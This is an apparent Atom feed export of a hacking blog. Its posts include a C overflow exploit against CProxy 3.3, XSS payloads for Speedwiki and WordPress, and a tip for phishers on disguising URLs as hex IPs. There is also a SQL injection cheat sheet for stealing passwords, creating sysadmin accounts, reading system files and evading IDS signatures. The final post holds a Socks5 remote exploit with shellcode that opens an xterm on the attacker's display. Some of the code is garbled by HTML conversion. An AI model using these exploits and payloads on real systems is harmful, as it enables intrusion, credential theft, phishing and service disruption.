<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-32910231</id><updated>2011-04-21T11:35:15.282-07:00</updated><title type='text'>Y0u're 0wn3d</title><subtitle type='html'>hacking + hacking</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://y0ure0wn3d.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://y0ure0wn3d.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>n3kr0</name><uri>http://www.blogger.com/profile/06618592311204129552</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://aycu28.webshots.com/image/3787/2002849526416932797_rs.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>8</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-32910231.post-8939698238373780978</id><published>2007-04-13T13:24:00.000-07:00</published><updated>2007-04-13T13:27:25.631-07:00</updated><title type='text'>Xploits an overflow vulnerability in CProxy 3.3</title><content type='html'>&lt;img style="margin: 0px auto 10px; display: block; text-align: center; width: 302px; height: 463px;" src="http://0wn3d.dk/owned/owned10.jpg" alt="" border="0" /&gt;&lt;br /&gt;&lt;pre&gt;/*&lt;br /&gt;* Remote Denial of Service for CProxy v3.3 - Service Pack 2&lt;br /&gt;*&lt;br /&gt;*&lt;br /&gt;*&lt;br /&gt;* This program xploits an overflow vulnerability in CProxy 3.3 SP2&lt;br /&gt;* HTTP Service (8080), causing server shutdown&lt;br /&gt;*&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;#include &lt;stdio.h&gt;&lt;br /&gt;#include &lt;stdlib.h&gt;&lt;br /&gt;#include &lt;unistd.h&gt;&lt;br /&gt;#include &lt;sys h=""&gt;&lt;br /&gt;#include &lt;sys h=""&gt;&lt;br /&gt;#include &lt;netdb.h&gt;&lt;br /&gt;#include &lt;netinet h=""&gt;&lt;br /&gt;#include &lt;arpa h=""&gt;&lt;br /&gt;&lt;br /&gt;#define BUFFERSIZE 247&lt;br /&gt;#define NOP 0x90&lt;br /&gt;// If you change this values you can change EIP and EBP values&lt;br /&gt;// to redirect to a code that you want &gt;;)&lt;br /&gt;#define EIP 0x61616161&lt;br /&gt;#define EBP 0x61616161&lt;br /&gt;&lt;br /&gt;void usage(char *progname) {&lt;br /&gt;fprintf(stderr,"Usage: %s &lt;hostname&gt; [eip] [ebp]\n",progname);&lt;br /&gt;exit(1);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;int main(int argc, char **argv) {&lt;br /&gt;char *ptr,buffer[BUFFERSIZE], remotedos[1024];&lt;br /&gt;unsigned long *long_ptr,eip=EIP, ebp=EBP;&lt;br /&gt;int aux,sock;&lt;br /&gt;struct sockaddr_in sin;&lt;br /&gt;unsigned long ip;&lt;br /&gt;struct hostent *he;&lt;br /&gt;&lt;br /&gt;fprintf(stderr,"\n-= Remote DoS for CProxy v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =-\n");&lt;br /&gt;&lt;br /&gt;if (argc&lt;2)&gt;=3) eip+=atol(argv[2]);&lt;br /&gt;&lt;br /&gt;if (argc&gt;=4) ebp+=atol(argv[3]);&lt;br /&gt;&lt;br /&gt;ptr=buffer;&lt;br /&gt;memset(ptr,0,sizeof(buffer));&lt;br /&gt;memset(ptr,NOP,sizeof(buffer)-8);&lt;br /&gt;ptr+=sizeof(buffer)-8;&lt;br /&gt;long_ptr=(unsigned long*)ptr;&lt;br /&gt;*(long_ptr++) = ebp;&lt;br /&gt;*(long_ptr++) = eip;&lt;br /&gt;ptr=(char *)long_ptr;&lt;br /&gt;*ptr='\0';&lt;br /&gt;&lt;br /&gt;bzero(remotedos, sizeof(remotedos));&lt;br /&gt;snprintf(remotedos, sizeof(remotedos), "GET http://%s HTTP/1.0\r\n\r\n\r\n",buffer);&lt;br /&gt;&lt;br /&gt;if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) &lt; he =" gethostbyname(argv[1]))" ip =" *(unsigned"&gt;h_addr;&lt;br /&gt;} else {&lt;br /&gt;if ((ip = inet_addr(argv[1])) == NULL) {&lt;br /&gt;perror("inet_addr()");&lt;br /&gt;return -1;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sin.sin_family = AF_INET;&lt;br /&gt;sin.sin_addr.s_addr = ip;&lt;br /&gt;sin.sin_port = htons(8080);&lt;br /&gt;&lt;br /&gt;fprintf(stderr,"\nEngaged...\n");&lt;br /&gt;if (connect(sock, (struct sockaddr *)&amp;amp;sin, sizeof(sin)) &lt;&gt;&lt;/hostname&gt;&lt;/arpa&gt;&lt;/netinet&gt;&lt;/netdb.h&gt;&lt;/sys&gt;&lt;/sys&gt;&lt;/unistd.h&gt;&lt;/stdlib.h&gt;&lt;/stdio.h&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/32910231-8939698238373780978?l=y0ure0wn3d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://y0ure0wn3d.blogspot.com/feeds/8939698238373780978/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=32910231&amp;postID=8939698238373780978' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default/8939698238373780978'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default/8939698238373780978'/><link rel='alternate' type='text/html' href='http://y0ure0wn3d.blogspot.com/2007/04/xploits-overflow-vulnerability-in.html' title='Xploits an overflow vulnerability in CProxy 3.3'/><author><name>n3kr0</name><uri>http://www.blogger.com/profile/06618592311204129552</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://aycu28.webshots.com/image/3787/2002849526416932797_rs.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-32910231.post-116335767418801664</id><published>2006-11-12T10:52:00.000-08:00</published><updated>2006-11-12T11:03:27.500-08:00</updated><title type='text'>X-ploit Speedwiki 2.0</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;product :Speedwiki 2.0&lt;br /&gt;vendor site: http://speedywiki.sourceforge.net/&lt;br /&gt;risk:critical&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;a user logged in , can upload a PHP script on the server , by the upload script , there's actually no upload filter on this cms&lt;br /&gt;path : /speedywiki/index.php?upload=1&lt;br /&gt;&lt;br /&gt;xss get :&lt;br /&gt;/index.php?showRevisions='"&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;full path disclosure :&lt;br /&gt;/speedywiki/index.php?showRevisions[]=&lt;br /&gt;/speedywiki/index.php?searchText[]=&lt;br /&gt;/speedywiki/upload.php&lt;br /&gt;&lt;br /&gt;laurent gaffié &amp;amp; benjamin mossé&lt;br /&gt;http://s-a-p.ca/&lt;br /&gt;contact: saps.audit@gmail.com&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/32910231-116335767418801664?l=y0ure0wn3d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://y0ure0wn3d.blogspot.com/feeds/116335767418801664/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=32910231&amp;postID=116335767418801664' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default/116335767418801664'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default/116335767418801664'/><link rel='alternate' type='text/html' href='http://y0ure0wn3d.blogspot.com/2006/11/x-ploit-speedwiki-20.html' title='X-ploit Speedwiki 2.0'/><author><name>n3kr0</name><uri>http://www.blogger.com/profile/06618592311204129552</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://aycu28.webshots.com/image/3787/2002849526416932797_rs.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-32910231.post-116287697697672758</id><published>2006-11-06T21:17:00.000-08:00</published><updated>2006-11-06T21:22:56.983-08:00</updated><title type='text'>Bug 4 karders</title><content type='html'>va para todos akellos dedikados al phishing o karders --&gt; pasar la IP a hexadecimal de la web a disfrazar ej. www.google.com --&gt; I.P. dir --&gt; 72.14.207.99 --&gt; hexadecimal &lt;a href="http://0x48.0x0e.0xcf.0x63"&gt;http://0x48.0x0e.0xcf.0x63&lt;/a&gt;  click para ver ;) karders, su vida vuelve a tomar un nuevo giro lollll&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/32910231-116287697697672758?l=y0ure0wn3d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://y0ure0wn3d.blogspot.com/feeds/116287697697672758/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=32910231&amp;postID=116287697697672758' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default/116287697697672758'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default/116287697697672758'/><link rel='alternate' type='text/html' href='http://y0ure0wn3d.blogspot.com/2006/11/bug-4-karders.html' title='Bug 4 karders'/><author><name>n3kr0</name><uri>http://www.blogger.com/profile/06618592311204129552</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://aycu28.webshots.com/image/3787/2002849526416932797_rs.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-32910231.post-116287639740667554</id><published>2006-11-06T21:12:00.000-08:00</published><updated>2006-11-06T21:13:17.413-08:00</updated><title type='text'>Bug Wordpress 2.0.1</title><content type='html'>link a explotar: http://host.domain.tld/wp-admin/options-general.php?page=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&lt;br /&gt;&lt;br /&gt;Fix:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;$ &lt;em&gt;svn diff wp-admin/admin.php&lt;/em&gt; Index: wp-admin/admin.php&lt;br /&gt;===================================================================&lt;br /&gt;— wp-admin/admin.php  (revision 3513)&lt;br /&gt;+++ wp-admin/admin.php  (working copy) @@ -61,7 +61,7 @@&lt;br /&gt;}  if (! file_exists(ABSPATH . “wp-content/plugins/$plugin_page”))&lt;br /&gt;&lt;span style="color:red;"&gt;-                       die(sprintf(__(’Cannot load %s.’), $plugin_page));&lt;/span&gt;&lt;br /&gt;&lt;span style="color:green;"&gt;+                       die(sprintf(__(’Cannot load %s.’), htmlentities($plugin_page)));&lt;/span&gt;&lt;br /&gt;if (! isset($_GET[’noheader’])) require_once(ABSPATH . ‘/wp-admin/admin-header.php’);&lt;/pre&gt;&lt;br /&gt;;)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/32910231-116287639740667554?l=y0ure0wn3d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://y0ure0wn3d.blogspot.com/feeds/116287639740667554/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=32910231&amp;postID=116287639740667554' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default/116287639740667554'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default/116287639740667554'/><link rel='alternate' type='text/html' href='http://y0ure0wn3d.blogspot.com/2006/11/bug-wordpress-201.html' title='Bug Wordpress 2.0.1'/><author><name>n3kr0</name><uri>http://www.blogger.com/profile/06618592311204129552</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://aycu28.webshots.com/image/3787/2002849526416932797_rs.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-32910231.post-115584454764242806</id><published>2006-08-17T12:55:00.000-07:00</published><updated>2006-08-17T12:55:47.646-07:00</updated><title type='text'>Sql Injection</title><content type='html'>Oracle&lt;br /&gt;--&gt;SYS.USER_OBJECTS (USEROBJECTS)&lt;br /&gt;--&gt;SYS.USER_VIEWS&lt;br /&gt;--&gt;SYS.USER_TABLES&lt;br /&gt;--&gt;SYS.USER_VIEWS&lt;br /&gt;--&gt;SYS.USER_TAB_COLUMNS&lt;br /&gt;--&gt;SYS.USER_CATALOG&lt;br /&gt;--&gt;SYS.USER_TRIGGERS&lt;br /&gt;--&gt;SYS.ALL_TABLES&lt;br /&gt;--&gt;SYS.TAB&lt;br /&gt;&lt;br /&gt;MySQL&lt;br /&gt;--&gt;mysql.user&lt;br /&gt;--&gt;mysql.host&lt;br /&gt;--&gt;mysql.db&lt;br /&gt;&lt;br /&gt;MS access&lt;br /&gt;--&gt;MsysACEs&lt;br /&gt;--&gt;MsysObjects&lt;br /&gt;--&gt;MsysQueries&lt;br /&gt;--&gt;MsysRelationships&lt;br /&gt;&lt;br /&gt;MS SQL Server&lt;br /&gt;--&gt;sysobjects&lt;br /&gt;--&gt;syscolumns&lt;br /&gt;--&gt;systypes&lt;br /&gt;--&gt;sysdatabases&lt;br /&gt;&lt;br /&gt;5.Grabbing passwords&lt;br /&gt;&lt;br /&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; @var select @var as var into temp end --&lt;br /&gt;&lt;br /&gt;' and 1 in (select var from temp)--&lt;br /&gt;&lt;br /&gt;' ; drop table temp --&lt;br /&gt;&lt;br /&gt;6.Create DB accounts.&lt;br /&gt;&lt;br /&gt;MS SQL&lt;br /&gt;exec sp_addlogin 'name' , 'password'&lt;br /&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;br /&gt;&lt;br /&gt;MySQL&lt;br /&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;br /&gt;&lt;br /&gt;Access&lt;br /&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;br /&gt;&lt;br /&gt;Postgres (requires Unix account)&lt;br /&gt;CRATE USER name WITH PASSWORD 'pass123'&lt;br /&gt;&lt;br /&gt;Oracle&lt;br /&gt;CRATE USER name IDENTIFIED BY pass123&lt;br /&gt;        TEMPORARY TABLESPACE temp&lt;br /&gt;         DEFAULT TABLESPACE users;&lt;br /&gt;GRANT CONNECT TO name;&lt;br /&gt;GRANT RESOURCE TO name;&lt;br /&gt;&lt;br /&gt;7.MySQL OS Interaction&lt;br /&gt;&lt;br /&gt;- ' union select 1,load_file('/etc/passwd'),1,1,1;&lt;br /&gt;&lt;br /&gt;8.Server name and config.&lt;br /&gt;&lt;br /&gt;- ' and 1 in (select @@servername)--&lt;br /&gt;- ' and 1 in (select servername from master.sysservers)--&lt;br /&gt;&lt;br /&gt;9.Retrieving VNC password from registry.&lt;br /&gt;&lt;br /&gt;- '; declare @out binary(8)&lt;br /&gt;- exec master..xp_regread&lt;br /&gt;- @rootkey = 'HKEY_LOCAL_MACHINE',&lt;br /&gt;- @key = 'SOFTWARE\ORL\WinVNC3\Default',&lt;br /&gt;- @value_name='password',&lt;br /&gt;- @value = @out output&lt;br /&gt;- select cast (@out as bigint) as x into TEMP--&lt;br /&gt;- ' and 1 in (select cast(x as varchar) from temp)--&lt;br /&gt;&lt;br /&gt;10.IDS Signature Evasion.&lt;br /&gt;Evading ' OR 1=1 Signature&lt;br /&gt;&lt;br /&gt;- ' OR 'unusual' = 'unusual'&lt;br /&gt;- ' OR 'something' = 'some'+'thing'&lt;br /&gt;- ' OR 'text' = N'text'&lt;br /&gt;- ' OR 'something' like 'some%'&lt;br /&gt;- ' OR 2 &gt; 1&lt;br /&gt;- ' OR 'text' &gt; 't'&lt;br /&gt;- ' OR 'whatever' in ('whatever')&lt;br /&gt;- ' OR 2 BETWEEN 1 and 3&lt;br /&gt;&lt;br /&gt;11.mySQL Input Validation Circumvention using Char().&lt;br /&gt;&lt;br /&gt;Inject without quotes (string = "%"):&lt;br /&gt;--&gt; ' or username like char(37);&lt;br /&gt;Inject with quotes (string="root"):&lt;br /&gt;--&gt; ' union select * from users where login = char(114,111,111,116);&lt;br /&gt;load files in unions (string = "/etc/passwd"):&lt;br /&gt;--&gt;' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;br /&gt;Check for existing files (string = "n.ext"):&lt;br /&gt;--&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;br /&gt;&lt;br /&gt;12.IDS Signature Evasion using comments.&lt;br /&gt;&lt;br /&gt;--&gt;'/**/OR/**/1/**/=/**/1&lt;br /&gt;--&gt;Username:' or 1/*&lt;br /&gt;--&gt;Password:*/=1--&lt;br /&gt;--&gt;UNI/**/ON SEL/**/ECT&lt;br /&gt;--&gt;(Oracle)     '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;br /&gt;--&gt;(MS SQL)    '; EXEC ('SEL' + 'ECT US' + 'ER')&lt;br /&gt;&lt;br /&gt;13.Strings without quotes.&lt;br /&gt;--&gt; INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)&lt;br /&gt;&lt;br /&gt;Greets: kaneda, modem, wildcard, #black and pulltheplug.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/32910231-115584454764242806?l=y0ure0wn3d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://y0ure0wn3d.blogspot.com/feeds/115584454764242806/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=32910231&amp;postID=115584454764242806' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default/115584454764242806'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default/115584454764242806'/><link rel='alternate' type='text/html' href='http://y0ure0wn3d.blogspot.com/2006/08/sql-injection.html' title='Sql Injection'/><author><name>n3kr0</name><uri>http://www.blogger.com/profile/06618592311204129552</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://aycu28.webshots.com/image/3787/2002849526416932797_rs.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-32910231.post-115584425211336101</id><published>2006-08-17T12:50:00.000-07:00</published><updated>2006-08-17T12:50:52.126-07:00</updated><title type='text'>Remote exploit for Socks5</title><content type='html'>&lt;pre&gt;/*&lt;br /&gt;* &lt;span style="font-size:180%;"&gt;&lt;span style="font-weight: bold;"&gt;!!!! Private do not distribute !!!!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;*&lt;br /&gt;* &lt;1080r2.c&gt; defintive socks5 remote exploit / linux x86&lt;br /&gt;*&lt;br /&gt;* Usage:&lt;br /&gt;* $ xhost +&lt;br /&gt;* $ ./1080r2 &lt;host&gt; &lt;your_ip&gt; [offset]&lt;br /&gt;* =&gt; And wait a xterm to be sent back to you...&lt;br /&gt;*&lt;br /&gt;* Vulnerables: (offset)&lt;br /&gt;* socks5-v1.0r10 (compiled on a turbolinux 4.0.5) =&gt; 0&lt;br /&gt;* socks5-v1.0r9 (compiled on a turbolinux 4.0.5) =&gt; 0&lt;br /&gt;* socks5-v1.0r8 (compiled on a turbolinux 4.0.5) =&gt; 0&lt;br /&gt;* socks5-v1.0r10 (compiled on a redhat 6.0) =&gt; 400&lt;br /&gt;* socks5-s5watch-1.0r9-2 (redhat-contrib) =&gt; no?&lt;br /&gt;* socks5-0.17-1 (redhat 4.2) =&gt; no&lt;br /&gt;* socks5-1.0r10-5 (redhat-contrib) =&gt; no??&lt;br /&gt;* socks5-server-1.0r6-8TL (TurboContrib) =&gt; no??&lt;br /&gt;*&lt;br /&gt;*&lt;br /&gt;*/&lt;br /&gt;                              &lt;br /&gt;#include &lt;stdio.h&gt;&lt;br /&gt;#include &lt;stdlib.h&gt;&lt;br /&gt;#include &lt;string.h&gt;&lt;br /&gt;#include &lt;signal.h&gt;&lt;br /&gt;#include &lt;unistd.h&gt;&lt;br /&gt;#include &lt;sys/time.h&gt;&lt;br /&gt;#include &lt;sys/types.h&gt;&lt;br /&gt;#include &lt;sys/socket.h&gt;&lt;br /&gt;#include &lt;netinet/in.h&gt;&lt;br /&gt;#include &lt;netinet/in_systm.h&gt;&lt;br /&gt;#include &lt;netinet/ip.h&gt;&lt;br /&gt;#include &lt;netdb.h&gt;&lt;br /&gt;#include &lt;arpa/inet.h&gt;&lt;br /&gt;#include &lt;arpa/nameser.h&gt;&lt;br /&gt;&lt;br /&gt;#define NOP 0x90&lt;br /&gt;#define MAXLEN 2000&lt;br /&gt;#define OFFSET 0x7fffd99d // TurboLinux 4.0.5&lt;br /&gt;#define ALIGN 3&lt;br /&gt;#define LENGTH 195&lt;br /&gt;&lt;br /&gt;char hell[120]=&lt;br /&gt;"\xeb\x29" // jmp 0x13&lt;br /&gt;"\x5e" // popl %esi&lt;br /&gt;"\x89\x76\x30" // movl %esi,0x30(%esi)&lt;br /&gt;"\x89\xf0" // movl %esi,%eax&lt;br /&gt;"\x83\xc0\x15" // addl $0x15,%eax&lt;br /&gt;"\x89\x46\x34" // movl %eax,0x34(%esi)&lt;br /&gt;"\x83\xc0\x09" // addl $0x9,%eax&lt;br /&gt;"\x89\x46\x38" // movl %eax,0x38(%esi)&lt;br /&gt;"\x31\xc0" // xorl %eax,%eax&lt;br /&gt;"\x89\x46\x3c" // movl %eax,0x3c(%esi)&lt;br /&gt;"\x88\x46\x14" // movb %eax,0x14(%esi)&lt;br /&gt;"\x88\x46\x1d" // movb %eax,0x1d(%esi)&lt;br /&gt;"\xb0\x0b" // movb $0xb,%al&lt;br /&gt;"\x89\xf3" // movl %esi,%ebx&lt;br /&gt;"\x8d\x4e\x30" // leal 0x30(%esi),%ecx&lt;br /&gt;"\x8d\x56\x3c" // leal 0x3c(%esi),%edx&lt;br /&gt;"\xcd\x80" // int $0x80&lt;br /&gt;"\xe8\xd2\xff\xff\xff" // call -0x22&lt;br /&gt;"/usr/X11R6/bin/xtermA"&lt;br /&gt;"-displayA"&lt;br /&gt;//"127.0.0.1:0"&lt;br /&gt;;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;char buf[MAXLEN];&lt;br /&gt;&lt;br /&gt;main(int argc, char *argv[]) {&lt;br /&gt;struct sockaddr_in to;&lt;br /&gt;char buff[1000];&lt;br /&gt;int sd;&lt;br /&gt;int pktlen;&lt;br /&gt;struct hostent *hp;&lt;br /&gt;int i;&lt;br /&gt;long *addr;&lt;br /&gt;int off;&lt;br /&gt;int alin;&lt;br /&gt;int len;&lt;br /&gt;int offset;&lt;br /&gt;&lt;br /&gt;if(argc==4) {&lt;br /&gt;offset=atoi(argv[3]);&lt;br /&gt;} else {&lt;br /&gt; if(argc==3) {&lt;br /&gt; offset=0;&lt;br /&gt; } else {&lt;br /&gt;  printf("Uso: ./1080r2 &lt;host&gt; &lt;your_ip&gt; [offset]\n");&lt;br /&gt;  exit(0); }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;len=LENGTH;&lt;br /&gt;off=OFFSET+offset;&lt;br /&gt;alin=ALIGN;&lt;br /&gt;              &lt;br /&gt;strcat(hell,argv[2]);&lt;br /&gt;strcat(hell,":0");&lt;br /&gt;&lt;br /&gt;memset(buf,NOP,len);&lt;br /&gt;memcpy(buf+len-strlen(hell)-1,hell,strlen(hell));&lt;br /&gt;              &lt;br /&gt;addr=(long *)(buf+alin);&lt;br /&gt;for (i=0;i&lt;46;i+=4)&lt;br /&gt;*(addr++) = off;&lt;br /&gt;                    &lt;br /&gt;buf[len-1]='\0';&lt;br /&gt;                    &lt;br /&gt;to.sin_family=AF_INET;&lt;br /&gt;to.sin_port = htons(1080);&lt;br /&gt;&lt;br /&gt;if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {&lt;br /&gt;               perror("gethostbyname()");&lt;br /&gt;               exit(0); }&lt;br /&gt;&lt;br /&gt;if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))&lt;0) {&lt;br /&gt;               perror("socket()");&lt;br /&gt;               exit(0); }&lt;br /&gt;&lt;br /&gt;memcpy((char *)&amp;to.sin_addr,(char *)hp-&gt;h_addr,hp-&gt;h_length);&lt;br /&gt;&lt;br /&gt;if(connect(sd,(struct sockaddr *)&amp;to,sizeof(to))!=0) {&lt;br /&gt;               perror("connect()");&lt;br /&gt;               exit(0); }&lt;br /&gt;printf("Connect: Ready to send overflow...\n");&lt;br /&gt;//getchar();&lt;br /&gt;&lt;br /&gt;// inicio&lt;br /&gt;&lt;br /&gt;pktlen=3;&lt;br /&gt;buff[0]=0x5; // SOCKS version 5&lt;br /&gt;buff[1]=0x1; // one authentication type...&lt;br /&gt;&lt;br /&gt;buff[2]=0x0; // no authentication&lt;br /&gt;//buff[2]=0x2; // userpass&lt;br /&gt;&lt;br /&gt;if(write(sd, buff, pktlen)!=pktlen) {&lt;br /&gt;perror("write error");&lt;br /&gt;exit(-1); }&lt;br /&gt;&lt;br /&gt;if(read(sd, buff, 2)!=2) {&lt;br /&gt;     perror("read error");&lt;br /&gt;     exit(-1); }&lt;br /&gt;    &lt;br /&gt;if(buff[0] != 0x5) {&lt;br /&gt;     printf("invalid response\n");&lt;br /&gt;     exit(-1); }&lt;br /&gt;&lt;br /&gt;if(buff[1] == 0xf) {&lt;br /&gt;     printf("proxy requires authenticationn");&lt;br /&gt;     exit(-1); }&lt;br /&gt;&lt;br /&gt;if(buff[1] != 0x0) {&lt;br /&gt;     printf("proxy returned an invalid authentication type\n");&lt;br /&gt;     exit(-1); }&lt;br /&gt;&lt;br /&gt;// autentificacion&lt;br /&gt;/*&lt;br /&gt;printf("\ndone\n");&lt;br /&gt;printf("sending autentificacion request...");&lt;br /&gt;&lt;br /&gt;pktlen=snprintf(buff, sizeof(buff), "\x01%c%s%c%s",&lt;br /&gt; strlen(username), username, strlen(password), password);&lt;br /&gt;  &lt;br /&gt;send(sd, buff, pktlen, 0);&lt;br /&gt;&lt;br /&gt;recv(sd, buff, 2, 0);&lt;br /&gt;&lt;br /&gt;if(buff[1] != 0x00) {&lt;br /&gt;       printf("username/password invalid\n");&lt;br /&gt;       exit (1); }&lt;br /&gt;*/      &lt;br /&gt;// conexion   &lt;br /&gt;  &lt;br /&gt;for(i=1;i&lt;=len;i++)&lt;br /&gt;       putchar(buf[i]);&lt;br /&gt;      &lt;br /&gt;printf("\ndone\n");&lt;br /&gt;printf("sending connection request...");&lt;br /&gt;&lt;br /&gt;pktlen=snprintf(buff, sizeof(buff), "\x05\x01%c\x03%c%s%c%c",&lt;br /&gt;  0x00, strlen(buf), buf, 0x11, 0x22);&lt;br /&gt;   &lt;br /&gt;if(write(sd, buff, pktlen)!=pktlen) {&lt;br /&gt; perror("write error");&lt;br /&gt;       exit(-1); }&lt;br /&gt;&lt;br /&gt;if(read(sd, buff, 4)!=4) {&lt;br /&gt;     perror("read error (1)");&lt;br /&gt;     exit(-1); }&lt;br /&gt;&lt;br /&gt;   switch(buff[1]) {&lt;br /&gt;   case 0: printf("succeeded\n"); break;&lt;br /&gt;   case 1: printf("general SOCKS server failure\n"); exit(-1);&lt;br /&gt;   case 2: printf("connection not allowed by ruleset\n"); exit(-1);&lt;br /&gt;   case 3: printf("network unreachable\n"); exit(-1);&lt;br /&gt;   case 4: printf("host unreachable\n"); exit(-1);&lt;br /&gt;   case 5: printf("connection refused\n"); exit(-1);&lt;br /&gt;   case 6: printf("TTL expired\n"); exit(-1);&lt;br /&gt;   case 7: printf("command not supported (?)\n"); exit(-1);&lt;br /&gt;   case 8: printf("address type not supported\n"); exit(-1);&lt;br /&gt;   default: printf("returned unknown error code\n"); exit(-1);&lt;br /&gt;   }&lt;br /&gt;             &lt;br /&gt;}                        &lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/32910231-115584425211336101?l=y0ure0wn3d.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://y0ure0wn3d.blogspot.com/feeds/115584425211336101/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=32910231&amp;postID=115584425211336101' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default/115584425211336101'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/32910231/posts/default/115584425211336101'/><link rel='alternate' type='text/html' 